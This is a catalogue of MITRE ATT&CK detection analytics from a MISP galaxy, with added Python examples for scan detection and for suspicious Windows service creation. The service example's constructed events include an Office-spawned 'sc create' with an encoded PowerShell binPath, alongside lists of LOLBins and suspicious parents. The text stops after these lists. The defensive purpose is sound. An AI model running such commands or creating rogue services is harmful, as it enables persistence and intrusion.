external_id AN1845
mitre_platforms ['Android']

Analytic 1854 - AN1854

Application vetting services can detect malicious code in applications. System partition integrity checking mechanisms can detect unauthorized or malicious code contained in the system partition.

Internal MISP references

UUID c8eb9196-3134-4954-9331-838556db9aa1 which can be used as unique global reference for Analytic 1854 - AN1854 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1854
mitre_platforms ['iOS']

Analytic 1549 - AN1549

Adversary installs or abuses IDE extensions via CLI or direct write to profile directories and then communicates with marketplaces or remote tunnel services. Chain: auditd execve (code/idea/eclipse) with install/update flags or writes under ~/.vscode/extensions, ~/.config/JetBrains → outbound flows to .visualstudio.com, marketplace.visualstudio.com, .jetbrains.com, githubusercontent.com, or SSH/WebSocket tunnel endpoints → optional ssh/node processes spawned by IDE.

Internal MISP references

UUID 4dff3c9a-4730-46de-af2f-dfa86b249167 which can be used as unique global reference for Analytic 1549 - AN1549 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1549
mitre_platforms ['Linux']

Analytic 1459 - AN1459

Detects adversarial archiving activity through invocation of utilities like tar, gzip, bzip2, or openssl used in non-administrative or unusual contexts. Correlates command execution patterns with file creation of compressed/encrypted outputs in staging directories (e.g., /tmp, /var/tmp).

Internal MISP references

UUID 8018e3a6-ab64-4fe2-9771-ca129091bc17 which can be used as unique global reference for Analytic 1459 - AN1459 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1459
mitre_platforms ['Linux']

Analytic 1954 - AN1954

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 9d36e6e7-9c6c-495c-9431-464fb525c4e8 which can be used as unique global reference for Analytic 1954 - AN1954 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1954
mitre_platforms ['PRE']

Analytic 1495 - AN1495

Monitor registry modifications to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages or ...\OSConfig\Security Packages, especially insertions of new DLL entries. Correlate this with subsequent DLL module loads into lsass.exe. Track unsigned or anomalous DLLs loading into LSASS using image load auditing. LSASS loads an unsigned DLL due to an AuditLevel=8 registry configuration, or a system reboot is followed by a DLL load into lsass.exe.

Internal MISP references

UUID b4a380ed-cc16-47cd-8fe1-44ccf4cad097 which can be used as unique global reference for Analytic 1495 - AN1495 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1495
mitre_platforms ['Windows']

Analytic 1594 - AN1594

Detection of suspicious enumeration of cloud storage objects via API calls such as AWS S3 ListObjectsV2, Azure List Blobs, or GCP ListObjects. Correlate access with account role, user context, and prior authentication activity to identify anomalous usage patterns (e.g., unusual account, unexpected regions, or large-scale enumeration in short time windows).

Internal MISP references

UUID be55aa59-62b5-40cd-bab2-dbc4de80da0e which can be used as unique global reference for Analytic 1594 - AN1594 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1594
mitre_platforms ['IaaS']

Analytic 1945 - AN1945

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID fed95f58-2b3a-46c5-a4b1-a3d378d036cb which can be used as unique global reference for Analytic 1945 - AN1945 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1945
mitre_platforms ['PRE']

Analytic 1466 - AN1466

Userland processes invoking syscall-heavy libraries (libc, glibc) followed by fork, mmap, or ptrace behavior commonly associated with code injection or memory manipulation.

Internal MISP references

UUID 552ff82d-467b-4aeb-a4c3-084ca24dbd3e which can be used as unique global reference for Analytic 1466 - AN1466 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1466
mitre_platforms ['Linux']

Analytic 1646 - AN1646

Application vetting services could look for the Android permission android.permission.QUERY_ALL_PACKAGES, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API LSApplicationWorkspace and apply extra scrutiny to applications that employ it.

Internal MISP references

UUID 992c6fa4-689c-4ce1-883f-f48a8b1c5ccc which can be used as unique global reference for Analytic 1646 - AN1646 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1646
mitre_platforms ['Android']

Analytic 1664 - AN1664

Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. Many properly configured firewalls may naturally block one-way command and control traffic.

Internal MISP references

UUID dec6e0d3-f4ae-48ed-90b9-ee32fd7e8dc6 which can be used as unique global reference for Analytic 1664 - AN1664 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1664
mitre_platforms ['iOS']

Analytic 1467 - AN1467

Execution of processes that link to CoreServices or Foundation APIs followed by creation of memory regions, code execution, or abnormal library injection.

Internal MISP references

UUID 5e02fe2a-7659-4871-b79e-7ea57373aa37 which can be used as unique global reference for Analytic 1467 - AN1467 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1467
mitre_platforms ['macOS']

Analytic 1476 - AN1476

Detects anomalous wireless connections such as unexpected SSID associations, failed or repeated authentication attempts, and connections outside of known geofenced networks. Defenders should monitor wireless connection logs and event codes for network discovery, authentication, and association events.

Internal MISP references

UUID 8586fd06-9801-473e-8ea6-d3da0ec82267 which can be used as unique global reference for Analytic 1476 - AN1476 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1476
mitre_platforms ['Windows']

Analytic 1764 - AN1764

Application vetting services can look for the use of the Android MediaProjectionManager class, applying extra scrutiny to applications that use the class. The user can view a list of apps with accessibility service privileges in the device settings.

Internal MISP references

UUID 427fe5c7-1b91-4d71-ae2c-6840d128f0bd which can be used as unique global reference for Analytic 1764 - AN1764 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1764
mitre_platforms ['Android']

Analytic 1647 - AN1647

Application vetting services could look for the Android permission android.permission.QUERY_ALL_PACKAGES, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API LSApplicationWorkspace and apply extra scrutiny to applications that employ it.

Internal MISP references

UUID bff6f104-006e-48e5-ac3f-4633bb3abac5 which can be used as unique global reference for Analytic 1647 - AN1647 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1647
mitre_platforms ['iOS']

Analytic 1674 - AN1674

Application vetting services could look for applications attempting to get android.os.SystemProperties or getprop with the runtime exec() command. This could indicate some level of sandbox evasion, as Google recommends against using system properties within applications.

Internal MISP references

UUID dd9778f4-5919-4796-9d4c-b3fb6ace453d which can be used as unique global reference for Analytic 1674 - AN1674 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1674
mitre_platforms ['iOS']

Analytic 1746 - AN1746

On Android, the user can use the device settings menu to view trusted CA certificates and look for unexpected or unknown certificates. A mobile security product could similarly examine the trusted CA certificate store for anomalies. Users can use the device settings menu to view which applications on the device are allowed to install unknown applications.

On iOS, the user can use the device settings menu to view installed Configuration Profiles and look for unexpected or unknown profiles. A Mobile Device Management (MDM) system could use the iOS MDM APIs to examine the list of installed Configuration Profiles for anomalies.

Internal MISP references

UUID f3da45bb-921e-4b4c-8fc3-666c7a37dea6 which can be used as unique global reference for Analytic 1746 - AN1746 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1746
mitre_platforms ['iOS']

Analytic 1468 - AN1468

An SMB-based remote file share access followed by lateral movement actions such as remote service creation, task scheduling, or suspicious process execution on the target host using ADMIN$ or C$ shares.

Internal MISP references

UUID 1a18402e-efb1-49c7-8615-dc907f838320 which can be used as unique global reference for Analytic 1468 - AN1468 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1468
mitre_platforms ['Windows']

Analytic 1486 - AN1486

VMware daemons or user processes encapsulating traffic (e.g., guest VMs tunneling via hostd). Defender sees network services inside ESXi creating flows inconsistent with management plane traffic, such as SSH forwarding or DNS-over-HTTPS from management interfaces.

Internal MISP references

UUID 7f128f2c-5b38-4088-9026-e251237f8add which can be used as unique global reference for Analytic 1486 - AN1486 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1486
mitre_platforms ['ESXi']

Analytic 1648 - AN1648

System information discovery can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 55699534-c11f-4f9b-8908-a0c7d59160fd which can be used as unique global reference for Analytic 1648 - AN1648 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1648
mitre_platforms ['Android']

Analytic 1846 - AN1846

The OS may show a notification to the user that the Signal or WhatsApp account has been linked to a new device.

Internal MISP references

UUID 758e4b0e-3564-4696-8d57-9e3d81198d52 which can be used as unique global reference for Analytic 1846 - AN1846 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1846
mitre_platforms ['iOS']

Analytic 1684 - AN1684

Application vetting services could detect when applications store data insecurely, for example, in unprotected external storage.

Internal MISP references

UUID b755f519-cc0c-44a4-865f-fa9ead44590f which can be used as unique global reference for Analytic 1684 - AN1684 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1684
mitre_platforms ['iOS']

Analytic 1496 - AN1496

Processes not typically associated with encryption loading asymmetric crypto libraries (e.g., rsaenh.dll, crypt32.dll) and subsequently initiating outbound TLS/SSL connections with abnormal certificate chains or handshakes. Defender correlates process creation, module load, and unusual encrypted sessions.

Internal MISP references

UUID 7e1c7338-11d5-4ab4-aefc-bbd81e26068d which can be used as unique global reference for Analytic 1496 - AN1496 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1496
mitre_platforms ['Windows']

Analytic 1946 - AN1946

Monitor for suspicious network traffic that could be indicative of probing for email addresses and/or usernames, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.

Internal MISP references

UUID b123fe68-1da5-4c80-b4f0-f3d476891e11 which can be used as unique global reference for Analytic 1946 - AN1946 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1946
mitre_platforms ['PRE']

Analytic 1964 - AN1964

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID b5842814-7d1b-484d-acd8-d1f776c6851f which can be used as unique global reference for Analytic 1964 - AN1964 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1964
mitre_platforms ['PRE']

Analytic 1469 - AN1469

Addition of credentials (keys, app passwords, x.509 certs) to existing cloud accounts, service principals, or OAuth apps via portal or API by non-standard identities or IP ranges.

Internal MISP references

UUID e95d8309-8435-4c32-9ac3-38e350c170c5 which can be used as unique global reference for Analytic 1469 - AN1469 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1469
mitre_platforms ['Identity Provider']

Analytic 1649 - AN1649

System information discovery can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 04e54116-5787-4bb0-9c4a-2b620a80b5dc which can be used as unique global reference for Analytic 1649 - AN1649 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1649
mitre_platforms ['iOS']

Analytic 1694 - AN1694

When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice. (Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks) On Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it.

Internal MISP references

UUID cbdcf6f3-00c3-4c38-bc7c-ffb6806f0a25 which can be used as unique global reference for Analytic 1694 - AN1694 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1694
mitre_platforms ['iOS']

Analytic 1477 - AN1477

Detects unauthorized wireless associations by monitoring wpa_supplicant logs, NetworkManager events, and system calls related to interface state changes. Anomalies include repeated association failures, new SSIDs outside baselined values, and rogue AP connections.

Internal MISP references

UUID 6ad3d8bb-fc6f-45fb-b44e-871c263230d8 which can be used as unique global reference for Analytic 1477 - AN1477 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1477
mitre_platforms ['Linux']

Analytic 1747 - AN1747

The OS may show a notification to the user that the SIM card has been transferred to another device.

Internal MISP references

UUID 085c9205-d55a-4e33-a5df-241e505be32f which can be used as unique global reference for Analytic 1747 - AN1747 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1747
mitre_platforms ['Android']

Analytic 1774 - AN1774

Application vetting services could look for android.permission.READ_CALENDAR or android.permission.WRITE_CALENDAR in an Android application’s manifest, or NSCalendarsUsageDescription in an iOS application’s Info.plist file. Most applications do not need calendar access, so extra scrutiny could be applied to those that request it. On both Android and iOS, the user can manage which applications have permission to access calendar information through the device settings screen, and revoke the permission if necessary.

Internal MISP references

UUID 38e2eb61-e650-4cdc-8f27-213b39499d34 which can be used as unique global reference for Analytic 1774 - AN1774 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1774
mitre_platforms ['Android']

Analytic 1478 - AN1478

Detects unauthorized Wi-Fi associations and SSID scanning activity using unified logs and airport command telemetry. Anomalies include rapid SSID switching, connections to unapproved SSIDs, or repeated authentication failures.

Internal MISP references

UUID 20c2cbdf-2a02-40d1-9d10-b91d9bbe3004 which can be used as unique global reference for Analytic 1478 - AN1478 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1478
mitre_platforms ['macOS']

Analytic 1487 - AN1487

Detects suspicious OAuth application integrations within Office 365 or Google Workspace environments, such as new app registrations, unexpected consent grants, or privilege assignments. Defenders should correlate between application creation/modification events and associated user or service principal activity to identify persistence via app integrations.

Internal MISP references

UUID 6feb9746-7b2c-4f6f-92c9-bfdb14eddddc which can be used as unique global reference for Analytic 1487 - AN1487 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1487
mitre_platforms ['Office Suite']

Analytic 1748 - AN1748

The OS may show a notification to the user that the SIM card has been transferred to another device.

Internal MISP references

UUID 4ce71d01-ba3b-4ed2-a615-766daa0ff144 which can be used as unique global reference for Analytic 1748 - AN1748 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1748
mitre_platforms ['iOS']

Analytic 1847 - AN1847

This is abuse of standard OS-level APIs and is therefore typically undetectable to the end user.

Internal MISP references

UUID 4ec34db8-7214-4059-925e-bdcd58bca391 which can be used as unique global reference for Analytic 1847 - AN1847 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1847
mitre_platforms ['Android']

Analytic 1784 - AN1784

Application vetting services could look for the Android permission android.permission.QUERY_ALL_PACKAGES, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API LSApplicationWorkspace and apply extra scrutiny to applications that employ it.

Internal MISP references

UUID 87d2ccc4-f82e-493d-9c6f-03303253aec2 which can be used as unique global reference for Analytic 1784 - AN1784 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1784
mitre_platforms ['Android']

Analytic 1497 - AN1497

Processes (e.g., bash, python, custom binaries) dynamically linking libcrypto/libssl for RSA key exchange, then creating external connections with abnormal certificate validation or handshake anomalies. Defender observes syscall traces and outbound asymmetric key exchanges from processes that do not normally speak TLS.

Internal MISP references

UUID 284edcb8-0141-4fe6-afb2-9fd8a2b82b49 which can be used as unique global reference for Analytic 1497 - AN1497 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1497
mitre_platforms ['Linux']

Analytic 1479 - AN1479

Detects rogue or suspicious wireless access attempts by monitoring firewall, WIDS/WIPS, and controller logs. Focus is on firewall rule changes, rogue AP detection, and anomalous MAC addresses connecting to access points.

Internal MISP references

UUID 8ea556b8-d6d3-430c-a438-847b00e607a5 which can be used as unique global reference for Analytic 1479 - AN1479 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1479
mitre_platforms ['Network Devices']

Analytic 1947 - AN1947

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID e46455a1-a3a3-4de9-916d-41ffd2721062 which can be used as unique global reference for Analytic 1947 - AN1947 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1947
mitre_platforms ['PRE']

Analytic 1974 - AN1974

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of generative artificial intelligence (i.e. Phishing, Phishing for Information).

Internal MISP references

UUID e4b35edc-f7fe-4f0d-aaaf-60fabc9d2698 which can be used as unique global reference for Analytic 1974 - AN1974 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1974
mitre_platforms ['PRE']

Analytic 1749 - AN1749

No standard detection method currently exists for this technique.

Internal MISP references

UUID 7247d454-c307-417a-90c7-a15452d0d83e which can be used as unique global reference for Analytic 1749 - AN1749 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1749
mitre_platforms ['Android']

Analytic 1794 - AN1794

Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 9396ec3f-2189-44d1-9c88-53ee3603236c which can be used as unique global reference for Analytic 1794 - AN1794 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1794
mitre_platforms ['iOS']

Analytic 1488 - AN1488

Detects anomalous SaaS application integration activity across environments such as Slack, Salesforce, or other enterprise SaaS services. Focus is on unauthorized app additions, unusual permission grants, and persistence through service principal tokens.

Internal MISP references

UUID 036a6a5d-bd87-45c7-bd68-43df76167786 which can be used as unique global reference for Analytic 1488 - AN1488 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1488
mitre_platforms ['SaaS']

Analytic 1848 - AN1848

Application vetting services could look for connections to unknown domains or IP addresses. Application vetting services may indicate precisely what content was requested during application execution.

Internal MISP references

UUID 86aa8777-e12a-4dab-81ed-354bed18f3db which can be used as unique global reference for Analytic 1848 - AN1848 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1848
mitre_platforms ['Android']

Analytic 1948 - AN1948

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 23855fa6-f6d6-4a9c-a270-ea1f2830ef60 which can be used as unique global reference for Analytic 1948 - AN1948 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1948
mitre_platforms ['PRE']

Analytic 1498 - AN1498

Applications or launchd services invoking RSA or public-key routines from the Security framework, followed by outbound SSL/TLS sessions with unrecognized certs or anomalous handshakes. Defender observes unified logs of API calls and suspicious network entropy.

Internal MISP references

UUID 6b63caad-5d8d-4f23-be77-4e81d8904da6 which can be used as unique global reference for Analytic 1498 - AN1498 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1498
mitre_platforms ['macOS']

Analytic 1984 - AN1984

Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in Cobalt Strike payloads.(Citation: Analyzing CS Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.

Internal MISP references

UUID 6f7fa682-fd50-4de4-add3-cbaa3c127b70 which can be used as unique global reference for Analytic 1984 - AN1984 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1984
mitre_platforms ['PRE']

Analytic 1489 - AN1489

Sustained execution of resource-intensive processes (e.g., cryptocurrency miners), often launched via scheduled tasks, WMI, or PowerShell. These processes frequently establish persistent external connections and attempt to evade detection using masqueraded or renamed binaries.

Internal MISP references

UUID 92157361-c2f8-45e6-9624-38a3cdb44598 which can be used as unique global reference for Analytic 1489 - AN1489 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1489
mitre_platforms ['Windows']

Analytic 1849 - AN1849

Application vetting services could look for connections to unknown domains or IP addresses. Application vetting services may indicate precisely what content was requested during application execution.

Internal MISP references

UUID d7e3296a-9f95-4061-b3f5-0f02910745ab which can be used as unique global reference for Analytic 1849 - AN1849 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1849
mitre_platforms ['iOS']

Analytic 1499 - AN1499

VMware services (hostd, vpxa) unexpectedly negotiating asymmetric crypto sessions to external endpoints outside vCenter or update servers. Defender sees encrypted handshakes in logs inconsistent with baseline ESXi communication patterns.

Internal MISP references

UUID 0f9943f2-0e7e-44da-b7dd-e1a7cd52aae0 which can be used as unique global reference for Analytic 1499 - AN1499 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1499
mitre_platforms ['ESXi']

Analytic 1949 - AN1949

Monitoring the content of network traffic can help detect patterns associated with active scanning activities. This can include identifying repeated connection attempts, unusual scanning behaviors, or probing activity targeting multiple IP addresses across a network. Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
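As an added worked example (not part of the MITRE analytic text), the following Python runs the two signals from the paragraph above over constructed flow records: a per-source sliding window that flags horizontal sweeps (many hosts on one port) and vertical scans (many ports on one host), and a baseline comparison for processes that have never used the network before. The record fields (ts, src, dst, dport, outcome), the thresholds and the sample addresses are assumptions chosen for the example.

```python
from collections import defaultdict

# Constructed flow records: an SMB sweep across 25 hosts, a 60-port scan of one host,
# and ordinary DNS/HTTPS traffic from a workstation. Not real captures.
SAMPLE_FLOWS = (
    [{"ts": i, "src": "203.0.113.5", "dst": f"10.0.0.{i + 1}", "dport": 445, "outcome": "rejected"}
     for i in range(25)]
    + [{"ts": 100 + i * 0.5, "src": "203.0.113.9", "dst": "10.0.0.8", "dport": 1 + i, "outcome": "rejected"}
       for i in range(60)]
    + [{"ts": i * 4, "src": "10.0.0.20", "dst": "10.0.0.1", "dport": 53, "outcome": "accepted"}
       for i in range(50)]
    + [{"ts": i * 9, "src": "10.0.0.20", "dst": "10.0.0.30", "dport": 443, "outcome": "accepted"}
       for i in range(20)]
)


def scan_alerts(flows, window=60.0, host_threshold=20, port_threshold=30):
    """One alert per (source, scan type) whose sliding window crosses a threshold."""
    by_src = defaultdict(list)
    for f in sorted(flows, key=lambda f: f["ts"]):
        by_src[f["src"]].append(f)
    alerts = {}
    for src, fl in by_src.items():
        start = 0
        for end in range(len(fl)):
            # advance the window start so that fl[start:end+1] spans at most `window` seconds
            while fl[end]["ts"] - fl[start]["ts"] > window:
                start += 1
            win = fl[start:end + 1]
            rejected = sum(f["outcome"] != "accepted" for f in win) / len(win)
            hosts = {f["dst"] for f in win}
            ports = defaultdict(set)
            for f in win:
                ports[f["dst"]].add(f["dport"])
            if len(hosts) >= host_threshold and (src, "horizontal") not in alerts:
                alerts[(src, "horizontal")] = {"src": src, "kind": "horizontal", "hosts": len(hosts),
                                               "rejected_ratio": rejected, "ts": fl[end]["ts"]}
            busiest = max(len(p) for p in ports.values())
            if busiest >= port_threshold and (src, "vertical") not in alerts:
                alerts[(src, "vertical")] = {"src": src, "kind": "vertical", "ports": busiest,
                                             "rejected_ratio": rejected, "ts": fl[end]["ts"]}
    return list(alerts.values())


def unexpected_network_processes(baseline, observed):
    """Process names seen making connections now that are absent from the learned baseline."""
    return sorted(set(observed) - set(baseline))


if __name__ == "__main__":
    for a in scan_alerts(SAMPLE_FLOWS):
        print(a)
    print(unexpected_network_processes(["chrome", "sshd", "curl"], ["chrome", "sshd", "notepad.exe"]))
```

The rejected ratio is reported rather than required: a scan of open ports completes its handshakes, so a threshold on failures alone would miss it. Tune the host and port thresholds against vulnerability scanners and monitoring systems you expect to see, which otherwise produce the same shape of traffic.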

Internal MISP references

UUID 4ba33f5f-5f75-40c5-96ab-b014e772f9a8 which can be used as unique global reference for Analytic 1949 - AN1949 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1949
mitre_platforms ['PRE']

Analytic 1994 - AN1994

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.

Internal MISP references

UUID 4e469a08-db8b-49c1-8bf6-f76ffa21860f which can be used as unique global reference for Analytic 1994 - AN1994 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1994
mitre_platforms ['PRE']

Analytic 1555 - AN1555

Detection of environment variable tampering (HISTFILE, HISTCONTROL, HISTFILESIZE) and absence of expected bash history writes. Correlation of unset or zeroed history variables with active shell sessions is indicative of adversarial evasion.

Internal MISP references

UUID 1f69e126-e849-43a1-9fca-b5c63a154daa which can be used as unique global reference for Analytic 1555 - AN1555 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1555
mitre_platforms ['Linux']

Analytic 1565 - AN1565

Atypical access to Slack or Teams conversations via APIs, automation tokens, or bulk message export functionality, particularly after an account takeover or rare sign-in pattern. Often includes mass retrieval of chat history, download of message content, or scraping of workspace/channel metadata.

Internal MISP references

UUID 222cf26f-e5cc-4b60-a7b2-39118b5c20d6 which can be used as unique global reference for Analytic 1565 - AN1565 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1565
mitre_platforms ['SaaS']

Analytic 1556 - AN1556

Detection of bash/zsh history suppression via HISTFILE/HISTCONTROL manipulation and absence of ~/.bash_history updates. Observing environment variable changes tied to terminal processes is a strong indicator.

Internal MISP references

UUID 2a5f1993-7035-4d94-b9d1-7edb1850d4e1 which can be used as unique global reference for Analytic 1556 - AN1556 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1556
mitre_platforms ['macOS']

Analytic 1655 - AN1655

Application vetting services could closely scrutinize applications that request Device Administrator permissions.

Internal MISP references

UUID dd7242e8-12d5-46b4-bc2c-cff6c2dbaa27 which can be used as unique global reference for Analytic 1655 - AN1655 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1655
mitre_platforms ['Android']

Analytic 1557 - AN1557

Detection of PowerShell history suppression using Set-PSReadLineOption with SaveNothing or altered HistorySavePath. Correlating these options with PowerShell usage highlights adversarial evasion attempts.

Internal MISP references

UUID 91870bc8-3a81-4d90-84e4-26c99b5642ef which can be used as unique global reference for Analytic 1557 - AN1557 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1557
mitre_platforms ['Windows']

Analytic 1575 - AN1575

Detects command-line or API-based creation/modification of Windows Services via sc.exe, powershell.exe, services.exe, or ChangeServiceConfig. Looks for creation/modification of autostart services via registry changes, file drops to System32\services, and anomalous parent-child process trees.
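The following Python is an added example (not MITRE's code) that applies the analytic above to constructed Sysmon/4688-style process-creation events and System-log 7045 "service was installed" records. It extracts the service binary from sc.exe create/config binPath= and New-Service -BinaryPathName command lines, then flags binaries in user-writable paths, script hosts used as the service binary, and installs spawned by Office. The event field names, the trusted and writable root lists, the parent list and the sample command lines are assumptions chosen for illustration.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (Sysmon EID 1 / Security 4688 shape); not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\sc.exe", "parent": r"C:\Windows\System32\cmd.exe", "user": r"CORP\alice",
     "cmdline": r'sc.exe create updsvc binPath= "C:\Users\Public\upd.exe" start= auto'},
    {"image": r"C:\Windows\System32\sc.exe", "parent": r"C:\Windows\System32\cmd.exe", "user": r"CORP\admin",
     "cmdline": "sc config wuauserv start= auto"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\msiexec.exe", "user": r"NT AUTHORITY\SYSTEM",
     "cmdline": r'powershell.exe New-Service -Name "AcmeAgent" -BinaryPathName "C:\Program Files\Acme\agent.exe" -StartupType Automatic'},
    {"image": r"C:\Windows\System32\sc.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "user": r"CORP\bob",
     "cmdline": r'sc create helper binPath= "cmd.exe /c powershell -enc SQBFAFgA" start= auto'},
]

TRUSTED_ROOTS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\program files")
WRITABLE_ROOTS = (r"c:\users", r"c:\windows\temp", r"c:\programdata")
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe",
           "wscript.exe", "cscript.exe"}
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

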